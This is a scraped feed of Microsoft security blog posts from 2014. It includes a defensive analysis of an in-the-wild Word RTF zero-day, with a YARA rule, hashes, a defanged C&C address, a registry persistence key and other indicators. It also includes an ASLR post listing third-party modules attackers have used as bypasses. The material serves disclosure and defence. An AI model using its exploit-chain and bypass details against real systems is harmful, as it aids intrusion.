below.</p> <p style="text-align:justify;"></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic4.png"><img width="439" height="312" style="border:1px solid currentColor;width:435px;height:331px;margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic4.png" /></a></p> <p></p> <p></p> <p>When the memory corruption vulnerability is triggered, the exploit gains initial code execution and in order to bypass DEP and ASLR, it tries to execute the ROP chain that allocates a large chunk of executable memory and transfers the control to the first piece of the shellcode (egghunter). This code then searches for the main shellcode placed at the end of the RTF document to execute it.</p> <p style="text-align:justify;"></p> <p style="text-align:justify;"></p> <p align="center"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic5.png"><img style="border:1px solid currentColor;margin-right:auto;margin-left:auto;display:block;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/pic5.png" /></a></p> <p style="text-align:justify;"><br /> One peculiar aspect of the main shellcode is the fact that it employs multiple consecutive layers of decryption and well-known anti-debugging tricks, such as test of debugging flags an, RDTSC timing checks and jump-hops over hooks, possibly to defeat automated sandbox, analysis tools and researchers. The shellcode has also been programmed with a special date-based deactivation logic. In fact, it parses the content of &ldquo;<i>C:\Windows\SoftwareDistribution\ReportingEvents.log</i>&rdquo; file and it scans all the available Microsoft updates installed on the machine. The shellcode will not perform any additional malicious action if there are updates installed after April, 8 2014. This means that even after a successful exploitation with reliable code execution, after this date the shellcode may decide to not drop the secondary backdoor payload and simply abort the execution. When the activation logic detects the correct condition to trigger, the exploit drops in the temporary folder a backdoor file named &lsquo;svchost.exe&rsquo; and runs it. The dropped backdoor is a generic malware written in Visual Basic 6 which communicates over HTTPS and relies on execution of multiple windows scripts via WScript.Shell and it can install/run additional MSI components.</p> <p style="text-align:justify;">&nbsp;</p> <p style="text-align:justify;"><b>Detection and indicators for defenders</b></p> <p style="text-align:justify;">We are providing a good list of IOCs (Indicator of Compromise) hoping to facilitate defensive efforts and to help security vendors and professionals to stay protected from this specific attack. The remote C&amp;C server used by the current backdoor in the file uses encrypted SSL traffic with a static self-signed certificate that can be easily detected.</p> <p style="text-align:justify;"><b>&nbsp;</b></p> <p style="text-align:center;"></p> <p style="text-align:center;"></p> <p style="text-align:center;"></p> <table style="margin-right:auto;margin-left:auto;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;YARA RULE (RTF)</b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="456" valign="top"> <p>rule SA2953095_RTF<br />{<br />&nbsp;&nbsp; meta:<br />&nbsp;&nbsp;&nbsp;&nbsp; description = &quot;MS Security Advisory 2953095&quot;</p> <p>&nbsp;<br />&nbsp;&nbsp; strings:<br />&nbsp;&nbsp;&nbsp; $badHdr&nbsp;&nbsp; = &quot;{\\rt{&quot;<br />&nbsp;&nbsp;&nbsp; $ocxTag&nbsp;&nbsp; = &quot;\\objocx\\&quot;<br />&nbsp;&nbsp;&nbsp; $mscomctl = &quot;MSComctlLib.&quot;<br />&nbsp;&nbsp;&nbsp; $rop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; = &quot;?\\u-554&quot;</p> <p>&nbsp;&nbsp; condition:<br />&nbsp;&nbsp;&nbsp; filesize &gt; 100KB and filesize &lt; 500KB<br />&nbsp;&nbsp;&nbsp; and $badHdr and $ocxTag and $mscomctl and #rop&gt;8<br />}&nbsp;</p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;SAMPLE HASHES</b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="456" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p>Filename: %TEMP%\svchost.exe</p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p>MD5: af63f1dc3bb37e54209139bd7a3680b1<br />SHA1: 77ec5d22e64c17473290fb05ec5125b7a7e02828</p> </td> </tr> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;C&amp;C SERVER AND&nbsp;<br /></b><b>&nbsp;PROTOCOL</b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="456" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p>C&amp;C Server: <br /> h**ps://185.12.44.51 Port: 443</p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><i>NOTE: on port 80 the C&amp;C host serves a webpage mimicking the content of &ldquo;http://www.latamcl.com/&rdquo; website</i></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><br />GET request example:<br />h**ps://185.12.44.51/[rannd_alpa_chars].[3charst]?[encodedpayload]<span style="font-family:Times New Roman;font-size:medium;"> </span></p> <br /> <p>User-Agent string:<br />&ldquo;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64;2*Uuhgco}%7)1&rdquo;</p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;C&amp;C SSL CERTIFICATE<br /></b><b>&nbsp;(self-signed)</b><span style="font-family:Times New Roman;font-size:medium;"> </span></p> </td> <td width="456" valign="top"><span style="font-family:Times New Roman;font-size:medium;"><span style="font-family:Times New Roman;font-size:medium;"></span></span> <p>Issuer:<br />&nbsp;&nbsp;&nbsp; CN=*<br />&nbsp;&nbsp;&nbsp; O=My Company Ltd<br />&nbsp;&nbsp;&nbsp; S=Berkshire<br />&nbsp;&nbsp;&nbsp; C=NW<br />&nbsp;NotBefore: 1/1/2013 3:33 AM<br />&nbsp;NotAfter: 1/1/2014 3:33 AM</p> <span style="font-family:Times New Roman;font-size:medium;"><span style="font-family:Times New Roman;font-size:medium;"></span></span> <p>Public Key Length: 1024 bits<br />Public Key: UnusedBits = 0</p> <span style="font-family:Times New Roman;font-size:medium;"><span style="font-family:Times New Roman;font-size:medium;"></span></span> <p>&nbsp;&nbsp;&nbsp; 0000&nbsp; 30 81 89 02 81 81 00 dc&nbsp; 72 fc af 8f 51 de 2d 27<br />&nbsp;&nbsp;&nbsp; 0010&nbsp; 3e de ad 21 ae 25 11 b6&nbsp; b0 6e ce 6d 79 e4 d3 81<br />&nbsp;&nbsp;&nbsp; 0020&nbsp; 4e 73 11 44 51 63 09 3b&nbsp; 1c e7 79 1f 85 82 94 c1<br />&nbsp;&nbsp;&nbsp; 0030&nbsp; e1 f1 83 b3 1c 6d 53 58&nbsp; 28 07 b5 80 86 30 51 2d<br />&nbsp;&nbsp;&nbsp; 0040&nbsp; 78 c0 48 e8 b2 8d fb 84&nbsp; e1 d1 59 ff d5 4e 1f 8f<br />&nbsp;&nbsp;&nbsp; 0050&nbsp; ff 60 44 56 6b 7b 4d 72&nbsp; 42 d6 da 6a 4c d4 6b 7d<br />&nbsp;&nbsp;&nbsp; 0060&nbsp; f1 68 4d 2c 62 58 53 e7&nbsp; cd cc a1 a4 a2 7a 29 7d<br />&nbsp;&nbsp;&nbsp; 0070&nbsp; 63 eb 42 30 af 24 eb 20&nbsp; 4c 86 f5 9e 6f 48 1c bd<br />&nbsp;&nbsp;&nbsp; 0080&nbsp; 28 aa 47 13 4b cc 53 02&nbsp; 03 01 00 01</p> <span style="font-family:Times New Roman;font-size:medium;"><span style="font-family:Times New Roman;font-size:medium;"></span></span> <p>Cert Hash(md5): f0 82 aa f8 16 0e 83 8c 20 d7 95 f0 9d d2 01 57<br />Cert Hash(sha1): df 72 40 fb 9b cd 53 12 eb a5 f9 c2 dd e7 a2 9a 1d c8 f3 55</p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;CRASH INDICATORS</b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="456" valign="top"> <p>Faulting application name: WINWORD.EXE,<br />version: 14.0.7113.5001, time stamp: 0x52866c04<br />Faulting module name: unknown,<br />version: 0.0.0.0, time stamp: 0x00000000<br />Exception code: 0xc0000005<br /><span style="background-color:#ffffff;">Fault offset: 0x40002???</span><br />Faulting process id: n/a<br />Faulting application start time: n/a<br />Faulting application path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE<br />Faulting module path: unknown<span>&nbsp;</span><span style="font-family:Times New Roman;font-size:medium;"> </span><span style="font-family:Times New Roman;font-size:medium;"><br /></span></p> <p><span style="font-family:Times New Roman;font-size:medium;">&nbsp;</span></p> </td> </tr> <tr> <td width="168" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b>&nbsp;REGISTRY INDICATORS</b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="456" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p>Registry key added:<br />HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Windows Startup Helper=&rdquo;%windir%\system32\wscript.exe %TEMP%\[malicious.vbs]&rdquo;<span style="font-family:Times New Roman;font-size:medium;"> </span></p> <p>Service name (possibly) created:<br />&ldquo;WindowsNetHelper&rdquo;<span style="font-family:Times New Roman;font-size:medium;">&nbsp;<br /></span>&nbsp;<span style="font-family:Times New Roman;font-size:medium;"> </span></p> </td> </tr> </tbody> </table> <p></p> <p><span style="font-size:medium;">&nbsp;</span></p> <p><span style="font-size:medium;">- Chengyun Chu and Elia Florio, MSRC Engineering</span></p> <p><span style="font-size:medium;">&nbsp;</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3625846&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">CVE-2014-17610dayMSRC2953095EMETRTF Microsoft Releases Security Advisory 2953095http://blogs.technet.com/b/msrc/archive/2014/03/24/microsoft-releases-security-advisory-2953095.aspxMon, 24 Mar 2014 18:00:29 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5b32be52-a0b0-41d2-94aa-7646a08f98c6Dustin C. Childs0<p>Today we released <a href="http://technet.microsoft.com/en-us/security/advisory/2953095"><span style="color:#0000ff;">Security Advisory 2953095</span></a> to notify customers of a vulnerability in Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. An attacker could cause remote code execution if someone was convinced to open a specially crafted Rich Text Format (RTF) file or a specially crafted mail in Microsoft Outlook while using Microsoft Word as the email viewer.</p> <p>As part of the security advisory, we have included an easy, one-click <a href="https://support.microsoft.com/kb/2953095"><span style="color:#0000ff;">Fix it</span></a> to address the known attack vectors. The Fix it is available to all customers and helps prevent known attacks that leverage the vulnerability to execute code. Additionally, applying the Fix it does not require a reboot. We encourage all customers using Microsoft Word to apply this Fix it to help protect their systems.</p> <p>The <a href="http://technet.microsoft.com/en-us/security/jj653751"><span style="color:#0000ff;">Enhanced Mitigation Experience Toolkit (EMET)</span></a> also helps to defend against this vulnerability when configured to work with Microsoft Office software. If you are using EMET 4.1 with the recommended settings, this configuration is already enabled and no additional steps are required.</p> <p>We also encourage you to follow the &quot;Protect Your Computer&quot; guidance of enabling a firewall, applying all software updates and installing anti-virus and anti-spyware software. In addition, we encourage everyone to exercise caution when visiting websites and avoid clicking suspicious links, or opening email messages from unfamiliar senders. More information can be found at <a href="http://www.microsoft.com/protect"><span style="color:#0000ff;">www.microsoft.com/protect</span></a>.</p> <p>We continue to work on a security update to address this issue. We are monitoring the threat landscape very closely and will continue to take appropriate action to help protect our global customers.</p> <p>Thank you,<br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0000ff;">Dustin Childs</span></a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3625661&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AdvisoryFix ItSecurity AdvisoryMicrosoft Office March 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/03/17/march-2014-security-bulletin-webcast-and-q-amp-a.aspxMon, 17 Mar 2014 21:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:7a99a3c8-cf34-4279-8096-669ca852c500Dustin C. Childs0<p>Today we published the <a href="http://blogs.technet.com/b/msrc/p/march-2014-security-bulletin-q-a.aspx">March 2014 Security Bulletin Webcast Questions &amp; Answers page</a>.&nbsp;We answered eight questions in total, with the majority focusing on the updates for Windows (<a href="https://technet.microsoft.com/security/bulletin/ms14-016">MS14-016</a>) and Internet Explorer (<a href="https://technet.microsoft.com/security/bulletin/ms14-012">MS14-012</a>). One question that was not answered on air has been included on the Q&amp;A page.</p> <p>Here is the video replay.</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/jYyh1AtW4m4?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/jYyh1AtW4m4?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, April 9, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the April bulletin release and answer your bulletin deployment questions live on the air.</p> <p>You can register to attend the webcast at the link below:</p> <p><b>Date: Wednesday, April 9, 2014<br /> Time: 11:00 a.m. PDT (UTC -7)<br /> Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572978&amp;Culture=en-US"><b>Attendee Registration</b></a></p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3625309&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastSecurity Bulletin WebcastInternet Explorer (IE) When ASLR makes the differencehttp://blogs.technet.com/b/srd/archive/2014/03/12/when-aslr-makes-the-difference.aspxWed, 12 Mar 2014 16:13:30 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:56fe7844-ad64-46cf-b139-84a150f943a1swiat0<p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">We wrote </span><span style="font-family:Calibri;font-size:medium;"><a href="http://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigating-common-exploitation-techniques.aspx">several times</a> </span><span style="font-family:Calibri;font-size:medium;">in this blog about the importance of enabling <i>Address Space Layout Randomization</i> mitigation (ASLR) in modern software because it&rsquo;s a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. </span><span style="font-family:Calibri;font-size:medium;">In today&rsquo;s blog, we&rsquo;ll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs not equipped with ASLR yet.</span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">Born with ASLR</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">ASLR mitigation adds a significant component in exploit development, but we realized that sometimes a single module without ASLR loaded in a program can be enough to compromise all the benefits at once. For this reason recent versions of most popular Microsoft programs were natively developed to enforce ASLR <span style="font-family:Calibri;font-size:medium;">automatically</span> for every module loaded into the process space. In fact <span style="text-decoration:underline;">Internet Explorer 10/11 and Microsoft Office 2013</span> are designed to run with full benefits of this mitigation and they <span style="text-decoration:underline;">enforce ASLR randomization natively without any additional setting on Win7 and above</span>, even for those DLLs not originally compiled with /DYNAMICBASE flag. So, customers using these programs have already a good native protection and they need to take care only of other </span><span style="font-size:medium;">programs potentially targeted by exploits not using ASLR.</span></span></p> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></b></p> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">ASLR effectiveness in action</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">Given the importance of ASLR, we are taking additional efforts to close gaps when ASLR bypasses arise in security conferences from time to time or when they are found in-the-wild used in targeted attacks. </span><span style="font-family:Calibri;font-size:medium;">The outcome of this effort is to strength protection also for previous versions of Microsoft OS and browser not able to enforce ASLR natively as IE 10/11 and Office 2013 can do. Some examples of recent updates designed to break well-known ASLR bypasses are showed in the following table.</span></p> <p style="text-align:justify;"></p> <div> <div> <table style="width:624px;height:182px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="96" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><b><span style="font-family:Calibri;font-size:medium;">MS BULLETIN</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="192" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><b><span style="font-family:Calibri;font-size:medium;">ASLR BYPASS</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="342" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><b><span style="font-family:Calibri;font-size:medium;">REFERENCE</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> </tr> <tr> <td width="96" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><a href="https://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx"><span style="font-family:Calibri;font-size:medium;">MS13-063</span><span style="font-family:Calibri;">&nbsp;</span></a></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="192" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-family:Calibri;font-size:medium;">LdrHotPatchRoutine</span></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="342" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-family:Calibri;font-size:medium;"><span style="font-family:Calibri;font-size:medium;">Ref:</span> <a href="http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf</span></a><br /></span></p> <p><span style="font-family:Calibri;font-size:medium;">Reported in Pwn2Own 2013, works only for Win7 x64</span><span style="font-family:Times New Roman;font-size:medium;">&nbsp;</span></p> </td> </tr> <tr> <td width="96" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><a href="https://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx"><span style="font-family:Calibri;font-size:medium;">MS13-106</span><span style="font-family:Calibri;">&nbsp;</span></a></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="192" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-family:Calibri;font-size:medium;">HXDS.DLL (Office 2007/2010)</span></p> <span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:medium;"></span></span></td> <td width="342" valign="top"><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:medium;"></span></span> <p><span style="font-family:Calibri;font-size:medium;">Ref: </span><a href="http://www.greyhathacker.net/?p=585"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://www.greyhathacker.net/?p=585</span></a><br /><span style="font-family:Calibri;font-size:medium;"></span></p> <p><span style="font-family:Calibri;font-size:medium;">Seen used in-the-wild with IE/Flash exploits <br />(CVE-2013-3893, CVE-2013-1347, <br />CVE-2012-4969, CVE-2012-4792)</span><span style="font-family:Times New Roman;font-size:medium;"> <br /><br /></span></p> </td> </tr> <tr> <td width="96" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms14-009"><span style="font-family:Calibri;font-size:medium;">MS14-009</span><span style="font-family:Calibri;">&nbsp;</span></a></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="192" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-family:Calibri;font-size:medium;">VSAVB7RT.DLL (.NET)</span></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> <td width="342" valign="top"><span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-family:Calibri;font-size:medium;">Ref: </span><a href="http://www.greyhathacker.net/?p=585"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://www.greyhathacker.net/?p=585</span></a><br /><span style="font-family:Times New Roman;font-size:medium;"><br /></span><span style="font-family:Calibri;font-size:medium;">Seen used in-the-wild with IE exploits <br />(CVE-2013-3893)</span></p> <span style="font-family:Times New Roman;font-size:medium;"></span></td> </tr> </tbody> </table> </div> <div></div> <div><span style="font-family:Times New Roman;font-size:medium;"> </span> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;"><br />We were glad to see the return of these recent ASLR updates in two recent attacks: the Flash exploit <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html">found in February (CVE-2014-0502)</a> in some </span><span style="font-family:Calibri;font-size:medium;">targeted attacks </span><span style="font-family:Calibri;font-size:medium;">and a privately reported bug for IE8 (CVE-2014-0324) just patched today. As showed from the code snippets below, the two exploits would not have been effective against </span><span style="font-family:Calibri;font-size:medium;">fully patched machines </span><span style="font-family:Calibri;font-size:medium;">with MS13-106 update installed running Vista or above.</span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <table style="width:630px;height:628px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="362" valign="top"><span style="font-family:Times New Roman;font-size:medium;">&nbsp;</span> <p><span style="font-family:Calibri;font-size:medium;"><span style="font-family:Calibri;font-size:medium;"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png"><img width="520" height="506" style="width:360px;height:364px;" alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png" border="0" /></a></span></span></p> </td> <td width="261" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;font-size:medium;"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png"></a><span style="font-family:Calibri;font-size:medium;"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/4786.pic1.png"></a></span>Exploit code for CVE-2014-0502 (Flash)</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106.</span><span style="font-family:Times New Roman;font-size:medium;"> </span></p> <p><span style="font-family:Calibri;font-size:medium;">NOTE: the code attempts also a second ASLR bypass based on Java 1.6.x</span><span style="font-family:Times New Roman;font-size:medium;"> </span></p> </td> </tr> <tr> <td width="362" valign="top"><span style="font-family:Times New Roman;font-size:medium;">&nbsp;</span><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3201.pic2.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/3201.pic2.png" border="0" /></a></td> <td width="261" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;font-size:medium;">Exploit code for CVE-2014-0324 (IE8)</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106.</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> </tbody> </table> <p><span style="font-family:Calibri;font-size:medium;"><span style="font-family:Times New Roman;font-size:medium;"> </span><br /></span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span><span style="font-family:Times New Roman;font-size:medium;"> </span><span style="font-family:Times New Roman;font-size:medium;"> </span> <p style="text-align:justify;"><b><span style="font-family:Calibri;font-size:medium;">Solutions for&nbsp;non-ASLR modules</span></b></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">The two&nbsp;exploit codes above shows another important lesson: even if Microsoft libraries are compiled natively with ASLR and even if we work hard to fix known ASLR gaps for our products, there are still opportunities for attackers in using third-party DLLs to tamper the ASLR ecosystem. The example of Java 1.6.x is a well-known case: due to the popularity of this software suite and due to the fact that it loads an old non-ASLR library&nbsp;into the browser <span style="font-family:Calibri;font-size:medium;">(MSVCR71.DLL)</span>, it became a very popular vector used in exploits to bypass ASLR. In fact, security researchers are frequently scanning for popular 3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> party libraries not compiled with /DYNAMICBASE that can allow a bypass; the following list is just an example of few common ones.</span></span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <table style="width:525px;height:489px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;"><span style="font-size:medium;">3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> PARTY ASLR BYPASS</span></span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;font-size:medium;">REFERENCE</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Java 1.6.x (MSVCR71.DLL)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Very common ASLR bypass used in-the-wild for multiple CVEs<br /><br />&nbsp;NOTE: Java 1.7.x uses MSVCR100.DLL which supports ASLR<br /></span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">DivX Player 10.0.2</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Yahoo Messenger 11.5.0.228</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">AOL Instant Messenger 7.5.14.8</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref: </span><a href="http://www.greyhathacker.net/?p=756"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://www.greyhathacker.net/?p=756</span></a><span style="font-family:Times New Roman;font-size:medium;">&nbsp;<br /></span><span style="font-family:Calibri;font-size:medium;">&nbsp;(not seen in real attacks)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">DropBox<br /></span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref:</span><a href="http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/</span></a><br /><span style="font-family:Calibri;font-size:medium;"><br />&nbsp;(not seen in real attacks)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">veraport20.Veraport20Ctl<br /> <br />Gomtvx.Launcher</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">INIUPDATER.INIUpdaterCtrl</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;"><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref: KISA report </span><a href="http://boho.or.kr/upload/file/EpF448.pdf"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://boho.or.kr/upload/file/EpF448.pdf</span></a></span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;(seen in-the-wild with CVE-2013-3893</span>)</p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> </tbody> </table> <p><span 